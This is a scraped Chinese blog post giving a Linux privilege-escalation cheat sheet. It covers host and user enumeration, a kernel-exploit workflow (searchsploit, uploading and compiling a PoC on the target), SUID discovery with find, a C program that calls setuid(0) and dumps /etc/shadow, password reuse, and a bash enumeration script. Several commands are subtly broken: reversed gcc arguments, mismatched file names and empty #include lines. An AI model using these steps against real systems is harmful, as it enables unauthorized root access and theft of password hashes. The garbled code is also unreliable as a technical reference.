linux提权 |
您所在的位置:网站首页 › linux给予用户权限 › linux提权 |
1.信息收集 uname -r 查看内核版本 uname -a 打印有用信息 uname -m 查看系统内核 hostname 系统主机名 lsb_release -a 查看发行版本程序运行服务 1.2、linux常用命令 2.用户和群组 cat /etc/passwd 列出系统上的所有用户 cat /etc/group 列出系统上的所有组 grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' 列出所有超级用户账号 w 目前已登录,他们在做什么 last 最后登录列表 3.用户和权限信息: whoami 当前用户 id 当前用户权限 sudo –l 当前用户 4.环境变量 env 显示环境变量 set 现实环境变量 echo %PATH 路径信息 history 显示当前用户的历史命令记录 pwd 输出工作目录 cat /etc/profile 显示默认系统变量 cat /etc/shells 显示可用的shell dpkg –l 查看安装软件 2.内核提权通过uname -a和lsb_release –a获取发行版本和内核版本, 反弹shell 通过kali的searchsploit linux ubuntu 3查找相应的漏洞 将相应的poc上传至目标服务器,此时可以通过菜刀或者命令方式将poc上传到/tmp 或者攻击者搭建apache服务将pc上传到var/www/html,目标机子进行下载,然后gcc -o 37292.c exp chmod 777 ./ecp #给予最高权限 ./exp 注意:在目标没有gcc的情况下可以进行安装后在删除,如果安装不了,最好找一个和目标机子一样的版本和内核进行编译 3.suid提权SUID定义为授予用户临时权限,使其具有文件所有者(而不是运行它的用户)的权限来运行程序/文件。简而言之,用户在执行文件/程序/命令时将获得文件所有者的权限以及所有者UID和GID。 sudi作用: Linux执行程序是以当前用户权限来运行,但对于一些特殊的指令,就需要用到 suid权限。例如普通用户修改个人密码需要用到 passwd命令,我们知道 /etc/passwd文件中每一行都存储着用户的一些基本属性,如用户名、口令、用户标识号、组标识号、注释性描述、主目录、登录Shell等信息。 常见的可用于SUID提权命令 Vim Find Bash More Less Cp Chmod Mv Man 本地查找符合条件的文件: find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \; suid权限仅对二进制程序有效,执行者对该程序具有x的可执行权限,才可以利用suid权限 此权限仅在执行该程序的过程中有效。 查看是否具备SUID权限(SUID权限的符号是s) 实操 #include #include int main() { setuid(0);//run as root system("id"); system("cat /etc/shadow"); } 以root权限进行编译和权限设置 gcc exp.c –o suexp chmod 4755 ./suexp 以低权限运行获取账号密码 4.明文密码和密码复用尝试使用查看/etc/passwd和/etc/shadow 用获取到的密码尝试进行root登录 5.批处理信息收集#!/bin/bash echo "====================================" echo "=====查看内核版本=====" uname -a echo "====================================" echo "=====查看系统内核=====" uname -m echo "====================================" echo "=====系统主机名=======" hostname echo "=====================================" echo "=====查看发行版本程序运行服务=====" lsb_release -a echo "=====================================" echo "=====网络=======" ifconfig 6.参考https://mp.weixin.qq.com/s/7fdT2eIDSUHRcHwxoN5X-w https://mp.weixin.qq.com/s/KlQn69OnJNL-1yC2jtZBcg https://www.cnblogs.com/bmjoker/p/9167260.html https://mp.weixin.qq.com/s/uk0qSfGA4yaj7ioQYmln-g 7.都是水文常规操作-重点 |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |